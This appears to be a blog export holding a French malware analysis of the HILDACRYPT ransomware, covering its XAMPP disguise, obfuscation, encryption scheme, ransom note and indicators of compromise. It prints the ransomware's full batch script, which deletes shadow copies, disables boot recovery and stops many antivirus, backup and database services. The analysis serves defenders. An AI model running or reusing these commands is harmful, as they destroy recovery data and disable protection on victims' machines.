{"id":52277,"date":"2019-11-05T00:00:00","date_gmt":"2019-11-04T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam"},"modified":"2020-02-18T13:59:57","modified_gmt":"2020-02-18T10:59:57","slug":"hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","status":"publish","type":"post","link":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","title":{"rendered":"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Bonjour, Habr ! Nous parlons encore des nouvelles versions de logiciels malveillants de la cat\u00e9gorie Ransomware. HILDACRYPT est un nouveau ransomware, repr\u00e9sentant la famille Hilda d\u00e9couverte en ao\u00fbt 2019, nomm\u00e9e d'apr\u00e8s le dessin anim\u00e9 du service de streaming Netflix qui a \u00e9t\u00e9 utilis\u00e9 pour la diffusion du logiciel. Aujourd'hui, nous d\u00e9couvrons les caract\u00e9ristiques techniques de ce virus ransomware mis \u00e0 jour.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/b42870531485dd30670e35e6a5e5125f.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><br \/>\nDans la premi\u00e8re version des ransomwares Hilda, le lien vers le <noindex><a rel=\"nofollow\" href=\"https:\/\/www.youtube.com\/watch?v=XCojP2Ubuto\">trailer<\/a><\/noindex> de la s\u00e9rie anim\u00e9e \u00e9tait contenu dans la lettre de ran\u00e7on. HILDACRYPT se cache toutefois derri\u00e8re un installateur l\u00e9gitime de XAMPP \u2013 une distribution Apache facile \u00e0 installer, incluant MariaDB, PHP et Perl. De plus, le fichier du ransomware porte un autre nom \u2013 xamp. De plus, le fichier du logiciel malveillant n\u2019a pas de signature \u00e9lectronique.<\/p>\n<h3>Analyse statique<\/h3>\n<p>\nLe ransomware est contenu dans un fichier PE32 .NET, \u00e9crit pour MS Windows. Sa taille est de 135 168 octets. Le code principal du programme et le code du programme protecteur sont \u00e9crits en C#. Selon l'indication de date et d'heure de compilation, le fichier binaire a \u00e9t\u00e9 cr\u00e9\u00e9 le 14 septembre 2019.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9b04f91f5f56ad0ff981bb2a944fa848.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSelon Detect It Easy, le ransomware est compress\u00e9 \u00e0 l'aide de Confuser et ConfuserEx, mais ces obfuscateurs sont les m\u00eames qu'auparavant, seul ConfuserEx \u00e9tant le successeur de Confuser, ce qui fait que les signatures de leur code sont similaires. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/ce65d4db560ea7d62ef228378ab207e6.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nHILDACRYPT est effectivement empaquet\u00e9 \u00e0 l'aide de ConfuserEx. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/eee308f9f6080b616c08e2f6709245d8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSHA-256 : 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<\/p>\n<h3>Vecteur d'attaque<\/h3>\n<p>\nIl est fort probable que le ransomware ait \u00e9t\u00e9 d\u00e9couvert sur l'un des sites consacr\u00e9s \u00e0 la programmation web, se faisant passer pour un programme l\u00e9gitime de XAMPP.<\/p>\n<p>On peut voir toute la cha\u00eene d'infection dans le <noindex><a rel=\"nofollow\" href=\"https:\/\/app.any.run\/tasks\/abe20240-2f3c-40cf-b5dd-4f0088ab1c5a\/\">app.any.run sandbox<\/a><\/noindex>.<\/p>\n<h3>Obfuscation <\/h3>\n<p>\nLes cha\u00eenes du ransomware sont stock\u00e9es sous forme chiffr\u00e9e. Lors du lancement, HILDACRYPT les d\u00e9chiffre \u00e0 l'aide de Base64 et AES-256-CBC.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9e2a478ba19480308dcff887c2353e18.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h3>Installation<\/h3>\n<p>\nTout d'abord, le ransomware cr\u00e9e dans %AppDataRoaming% un dossier dont le param\u00e8tre GUID (Identifiant Unique Global) est g\u00e9n\u00e9r\u00e9 al\u00e9atoirement. En ajoutant un fichier bat \u00e0 cet emplacement, le ransomware l'ex\u00e9cute avec cmd.exe :<\/p>\n<p><i>cmd.exe \/c JKfgkgj3hjgfhjka.bat &amp; exit<br \/>\n<\/i><br \/>\n<img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/5319151b3f57af2394e6031f4cd1bcd6.jpg\" style=\"display:block;margin: 0 auto;\" \/><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/c0c749619f3f9a240e362f5effb5ea2e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\nEnsuite, il commence l'ex\u00e9cution d'un script batch pour d\u00e9sactiver les fonctions ou services syst\u00e8me.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/ecea9735d151835ddeeb62986b325399.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nLe script contient une longue liste de commandes permettant de supprimer les copies d'ombre, de d\u00e9sactiver le serveur SQL, de r\u00e9aliser des sauvegardes et de d\u00e9sactiver des solutions antivirus.<\/p>\n<p>Par exemple, il essaie sans succ\u00e8s d'arr\u00eater les services de sauvegarde Acronis Backup. De plus, il attaque les syst\u00e8mes de sauvegarde et les solutions antivirus des fournisseurs suivants : Veeam, Sophos, Kaspersky, McAfee et d'autres.<\/p>\n<pre><code class=\"plaintext\">@echo off\n:: Je ne suis pas vraiment fan des poneys, les filles de dessins anim\u00e9s sont meilleures, non ?\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=unbounded\nbcdedit \/set {default} recoveryenabled No\nbcdedit \/set {default} bootstatuspolicy ignoreallfailures\nvssadmin Delete Shadows \/all \/quiet\nnet stop SQLAgent$SYSTEM_BGC \/y\nnet stop \u201cSophos Device Control Service\u201d \/y\nnet stop macmnsvc \/y\nnet stop SQLAgent$ECWDB2 \/y\nnet stop \u201cZoolz 2 Service\u201d \/y\nnet stop McTaskManager \/y\nnet stop \u201cSophos AutoUpdate Service\u201d \/y\nnet stop \u201cSophos System Protection Service\u201d \/y\nnet stop EraserSvc11710 \/y\nnet stop PDVFSService \/y\nnet stop SQLAgent$PROFXENGAGEMENT \/y\nnet stop SAVService \/y\nnet stop MSSQLFDLauncher$TPSAMA \/y\nnet stop EPSecurityService \/y\nnet stop SQLAgent$SOPHOS \/y\nnet stop \u201cSymantec System Recovery\u201d \/y\nnet stop Antivirus \/y\nnet stop SstpSvc \/y\nnet stop MSOLAP$SQL_2008 \/y\nnet stop TrueKeyServiceHelper \/y\nnet stop sacsvr \/y\nnet stop VeeamNFSSvc \/y\nnet stop FA_Scheduler \/y\nnet stop SAVAdminService \/y\nnet stop EPUpdateService \/y\nnet stop VeeamTransportSvc \/y\nnet stop \u201cSophos Health Service\u201d \/y\nnet stop bedbg \/y\nnet stop MSSQLSERVER \/y\nnet stop KAVFS \/y\nnet stop Smcinst \/y\nnet stop MSSQLServerADHelper100 \/y\nnet stop TmCCSF \/y\nnet stop wbengine \/y\nnet stop SQLWriter \/y\nnet stop MSSQLFDLauncher$TPS \/y\nnet stop SmcService \/y\nnet stop ReportServer$TPSAMA \/y\nnet stop swi_update \/y\nnet stop AcrSch2Svc \/y\nnet stop MSSQL$SYSTEM_BGC \/y\nnet stop VeeamBrokerSvc \/y\nnet stop MSSQLFDLauncher$PROFXENGAGEMENT \/y\nnet stop VeeamDeploymentService \/y\nnet stop SQLAgent$TPS \/y\nnet stop DCAgent \/y\nnet stop \u201cSophos Message Router\u201d \/y\nnet stop MSSQLFDLauncher$SBSMONITORING \/y\nnet stop wbengine \/y\nnet stop MySQL80 \/y\nnet stop MSOLAP$SYSTEM_BGC \/y\nnet stop ReportServer$TPS \/y\nnet stop MSSQL$ECWDB2 \/y\nnet stop SntpService \/y\nnet stop SQLSERVERAGENT \/y\nnet stop BackupExecManagementService \/y\nnet stop SMTPSvc \/y\nnet stop mfefire \/y\nnet stop BackupExecRPCService \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop klnagent \/y\nnet stop MSExchangeSA \/y\nnet stop MSSQLServerADHelper \/y\nnet stop SQLTELEMETRY \/y\nnet stop \u201cSophos Clean Service\u201d \/y\nnet stop swi_update_64 \/y\nnet stop \u201cSophos Web Control Service\u201d \/y\nnet stop EhttpSrv \/y\nnet stop POP3Svc \/y\nnet stop MSOLAP$TPSAMA \/y\nnet stop McAfeeEngineService \/y\nnet stop \u201cVeeam Backup Catalog Data Service\u201d \/\nnet stop MSSQL$SBSMONITORING \/y\nnet stop ReportServer$SYSTEM_BGC \/y\nnet stop AcronisAgent \/y\nnet stop KAVFSGT \/y\nnet stop BackupExecDeviceMediaService \/y\nnet stop MySQL57 \/y\nnet stop McAfeeFrameworkMcAfeeFramework \/y\nnet stop TrueKey \/y\nnet stop VeeamMountSvc \/y\nnet stop MsDtsServer110 \/y\nnet stop SQLAgent$BKUPEXEC \/y\nnet stop UI0Detect \/y\nnet stop ReportServer \/y\nnet stop SQLTELEMETRY$ECWDB2 \/y\nnet stop MSSQLFDLauncher$SYSTEM_BGC \/y\nnet stop MSSQL$BKUPEXEC \/y\nnet stop SQLAgent$PRACTTICEBGC \/y\nnet stop MSExchangeSRS \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop McShield \/y\nnet stop SepMasterService \/y\nnet stop \u201cSophos MCS Client\u201d \/y\nnet stop VeeamCatalogSvc \/y\nnet stop SQLAgent$SHAREPOINT \/y\nnet stop NetMsmqActivator \/y\nnet stop kavfsslp \/y\nnet stop tmlisten \/y\nnet stop ShMonitor \/y\nnet stop MsDtsServer \/y\nnet stop SQLAgent$SQL_2008 \/y\nnet stop SDRSVC \/y\nnet stop IISAdmin \/y\nnet stop SQLAgent$PRACTTICEMGT \/y\nnet stop BackupExecJobEngine \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop BackupExecAgentBrowser \/y\nnet stop VeeamHvIntegrationSvc \/y\nnet stop masvc \/y\nnet stop W3Svc \/y\nnet stop \u201cSQLsafe Backup Service\u201d \/y\nnet stop SQLAgent$CXDB \/y\nnet stop SQLBrowser \/y\nnet stop MSSQLFDLauncher$SQL_2008 \/y\nnet stop VeeamBackupSvc \/y\nnet stop \u201cSophos Safestore Service\u201d \/y\nnet stop svcGenericHost \/y\nnet stop ntrtscan \/y\nnet stop SQLAgent$VEEAMSQL2012 \/y\nnet stop MSExchangeMGMT \/y\nnet stop SamSs \/y\nnet stop MSExchangeES \/y\nnet stop MBAMService \/y\nnet stop EsgShKernel \/y\nnet stop ESHASRV \/y\nnet stop MSSQL$TPSAMA \/y\nnet stop SQLAgent$CITRIX_METAFRAME \/y\nnet stop VeeamCloudSvc \/y\nnet stop \u201cSophos File Scanner Service\u201d \/y\nnet stop \u201cSophos Agent\u201d \/y\nnet stop MBEndpointAgent \/y\nnet stop swi_service \/y\nnet stop MSSQL$PRACTICEMGT \/y\nnet stop SQLAgent$TPSAMA \/y\nnet stop McAfeeFramework \/y\nnet stop \u201cEnterprise Client Service\u201d \/y\nnet stop SQLAgent$SBSMONITORING \/y\nnet stop MSSQL$VEEAMSQL2012 \/y\nnet stop swi_filter \/y\nnet stop SQLSafeOLRService \/y\nnet stop BackupExecVSSProvider \/y\nnet stop VeeamEnterpriseManagerSvc \/y\nnet stop SQLAgent$SQLEXPRESS \/y\nnet stop OracleClientCache80 \/y\nnet stop MSSQL$PROFXENGAGEMENT \/y\nnet stop IMAP4Svc \/y\nnet stop ARSM \/y\nnet stop MSExchangeIS \/y\nnet stop AVP \/y\nnet stop MSSQLFDLauncher \/y\nnet stop MSExchangeMTA \/y\nnet stop TrueKeyScheduler \/y\nnet stop MSSQL$SOPHOS \/y\nnet stop \u201cSQL Backups\u201d \/y\nnet stop MSSQL$TPS \/y\nnet stop mfemms \/y\nnet stop MsDtsServer100 \/y\nnet stop MSSQL$SHAREPOINT \/y\nnet stop WRSVC \/y\nnet stop mfevtp \/y\nnet stop msftesql$PROD \/y\nnet stop mozyprobackup \/y\nnet stop MSSQL$SQL_2008 \/y\nnet stop SNAC \/y\nnet stop ReportServer$SQL_2008 \/y\nnet stop BackupExecAgentAccelerator \/y\nnet stop MSSQL$SQLEXPRESS \/y\nnet stop MSSQL$PRACTTICEBGC \/y\nnet stop VeeamRESTSvc \/y\nnet stop sophossps \/y\nnet stop ekrn \/y\nnet stop MMS \/y\nnet stop \u201cSophos MCS Agent\u201d \/y\nnet stop RESvc \/y\nnet stop \u201cAcronis VSS Provider\u201d \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop MSSQLFDLauncher$SHAREPOINT \/y\nnet stop \u201cSQLsafe Filter Service\u201d \/y\nnet stop MSSQL$PROD \/y\nnet stop SQLAgent$PROD \/y\nnet stop MSOLAP$TPS \/y\nnet stop VeeamDeploySvc \/y\nnet stop MSSQLServerOLAPService \/y\ndel %0\n<\/code><\/pre>\n<p>\nUne fois que les services et processus mentionn\u00e9s ci-dessus sont d\u00e9sactiv\u00e9s, le cryptolocker recueille des informations sur tous les processus en cours d'ex\u00e9cution en utilisant la commande tasklist, afin de s'assurer que tous les services n\u00e9cessaires sont hors service. <br \/>\n<i>tasklist v \/fo csv<\/i><\/p>\n<p>Cette commande renvoie une liste d\u00e9taill\u00e9e des processus en cours, dont les \u00e9l\u00e9ments sont s\u00e9par\u00e9s par des virgules. <br \/>\n<i>\u00abcsrss.exe\u00bb, \u00ab448\u00bb, \u00abservices\u00bb, \u00ab0\u00bb, \u00ab1\u202f896 octets\u00bb, \u00abinconnu\u00bb, \u00ab0:00:03\u00bb<br \/>\n<\/i><\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/b16a8f52dba47ace2ca99d120f4f9b01.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nApr\u00e8s cette v\u00e9rification, le ransomware commence le processus de chiffrement. <\/p>\n<h3>Chiffrement <br \/>\n<\/h3>\n<h4>Chiffrement des fichiers<\/h4>\n<p>\nHILDACRYPT parcourt tout le contenu trouv\u00e9 sur les disques durs, \u00e0 l'exception des dossiers Recycle.Bin et Reference AssembliesMicrosoft. Ce dernier contient des fichiers critiques tels que dll, pdb, etc., pour les applications .Net, qui peuvent affecter le fonctionnement du ransomware. Pour rechercher les fichiers \u00e0 chiffrer, la liste d'extensions suivante est utilis\u00e9e :<\/p>\n<p><i>.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md<br \/>\n<\/i><br \/>\nPour chiffrer les fichiers de l'utilisateur, le ransomware utilise l'algorithme AES-256-CBC. La taille de la cl\u00e9 est de 256 bits, et celle du vecteur d'initialisation (IV) est de 16 octets. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/7c1a57562a3f8ada074639fbab35429d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nDans la capture d'\u00e9cran suivante, les valeurs byte_2 et byte_1 ont \u00e9t\u00e9 obtenues al\u00e9atoirement \u00e0 l'aide de GetBytes(). <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/fcd506b4ebf6ccb056b69ccc7249641a.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nCl\u00e9<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9af5398ae995176297743fbd94054d6d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nVI<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/e6626bce140fdfca6bb989602b959786.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nUn fichier chiffr\u00e9 a l'extension HCY!.. C'est un exemple de fichier chiffr\u00e9. Une cl\u00e9 et un IV, mentionn\u00e9s ci-dessus, ont \u00e9t\u00e9 cr\u00e9\u00e9s pour ce fichier. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/f6d659bfe8a8217457e06fed916a4f2d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h4>Chiffrement des cl\u00e9s<\/h4>\n<p>\nLe cryptolocker conserve la cl\u00e9 AES g\u00e9n\u00e9r\u00e9e dans le fichier chiffr\u00e9. La premi\u00e8re partie du fichier chiffr\u00e9 contient un en-t\u00eate avec des donn\u00e9es telles que HILDACRYPT, KEY, IV, FileLen au format XML, et ressemble \u00e0 ceci :<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/e0d887d87b06346da88104c2d60940b8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nLe chiffrement de la cl\u00e9 AES et de l'IV se fait \u00e0 l'aide de RSA-2048, et le codage s'effectue avec Base64. La cl\u00e9 publique RSA est stock\u00e9e dans le corps du cryptolocker dans l'une des cha\u00eenes chiffr\u00e9es au format XML.<\/p>\n<p><code>28guEbzkzciKg3N\/ExUq8jGcshuMSCmoFsh\/3LoMyWzPrnfHGhrgotuY\/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u\/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5\/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8\/qfjMtZ41sIIIEyajVKfA18OT72\/UBME2gsAM\/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa\/jQ==AQAB<br \/>\n<\/code><\/p>\n<p>Pour chiffrer la cl\u00e9 du fichier AES, on utilise la cl\u00e9 publique RSA. La cl\u00e9 publique RSA est encod\u00e9e avec Base64 et se compose d'un module et de l'exposant public 65537. Pour le d\u00e9chiffrement, il faut la cl\u00e9 priv\u00e9e RSA, que poss\u00e8de l'attaquant.<\/p>\n<p>Apr\u00e8s le chiffrement RSA, la cl\u00e9 AES est cod\u00e9e avec Base64 et conserv\u00e9e dans le fichier chiffr\u00e9.<\/p>\n<h3>Message de ran\u00e7on<\/h3>\n<p>\n\u00c0 la fin du chiffrement, HILDACRYPT enregistre un fichier html dans le dossier o\u00f9 il a chiffr\u00e9 les fichiers. La notification du logiciel de ran\u00e7on contient deux adresses e-mail par lesquelles la victime peut contacter l'attaquant.<\/p>\n<ul>\n<li><i>hildalolilovesyou@airmail.cc<\/i><br \/>\n hildalolilovesyou@memeware.net\n<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"HILDACRYPT : un nouveau ransomware frappe les syst\u00e8mes de sauvegarde et les solutions antivirus\" src=\"\/wp-content\/uploads\/2019\/11\/9996e9a6741ac3b8c423374c83924a91.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nLa notification du ran\u00e7on contient \u00e9galement la phrase \u00abNo loli is safe;)\u00bb \u2014 \u00abAucune loli n'est en s\u00e9curit\u00e9;)\u00bb, une r\u00e9f\u00e9rence aux personnages d'anime et de manga ayant l'apparence de petites filles, interdits au Japon.<\/p>\n<h3>Sortie<\/h3>\n<p>\nHILDACRYPT, une nouvelle famille de ransomwares, a sorti une nouvelle version. Le mod\u00e8le de chiffrement ne permet pas \u00e0 la victime de d\u00e9chiffrer les fichiers chiffr\u00e9s par le ransomware. Le cryptolocker utilise des m\u00e9thodes de protection active pour d\u00e9sactiver les services de protection li\u00e9s aux syst\u00e8mes de sauvegarde et aux solutions antivirus. L'auteur de HILDACRYPT est un fan de la s\u00e9rie anim\u00e9e Hilda, diffus\u00e9e sur Netflix, dont le lien vers la bande-annonce figurait dans la lettre de ran\u00e7on de la version pr\u00e9c\u00e9dente du logiciel. <\/p>\n<p>Comme d'habitude, <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/business\/backup\/\">Acronis Backup<\/a><\/noindex> et <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/personal\/computer-backup\/\">Acronis True Image<\/a><\/noindex> peuvent prot\u00e9ger votre ordinateur contre le ransomware HILDACRYPT, et les fournisseurs peuvent prot\u00e9ger leurs clients gr\u00e2ce \u00e0 <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cloud\/service-provider\/backup\/\">Acronis Backup Cloud<\/a><\/noindex>. La protection est assur\u00e9e par le fait que ces solutions <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cyber-protection\/\">de cybers\u00e9curit\u00e9<\/a><\/noindex> comprennent non seulement la sauvegarde, mais aussi notre syst\u00e8me de protection int\u00e9gr\u00e9. <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/ransomware-protection\/\">Acronis Active Protection<\/a><\/noindex> \u2014 une technologie renforc\u00e9e par un mod\u00e8le d'apprentissage automatique et bas\u00e9e sur des heuristiques comportementales, capable comme aucune autre de faire face aux menaces de ransomwares de jour z\u00e9ro.<\/p>\n<h3>Indicateurs de compromis<\/h3>\n<p>\nExtension de fichier HCY!<br \/>\nHILDACRYPTReadMe.html<br \/>\nxamp.exe avec une lettre \u00ab p \u00bb et sans signature num\u00e9rique<br \/>\nSHA-256 : 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<br \/>\n<br \/>Source : <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/acronis\/blog\/474048\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f 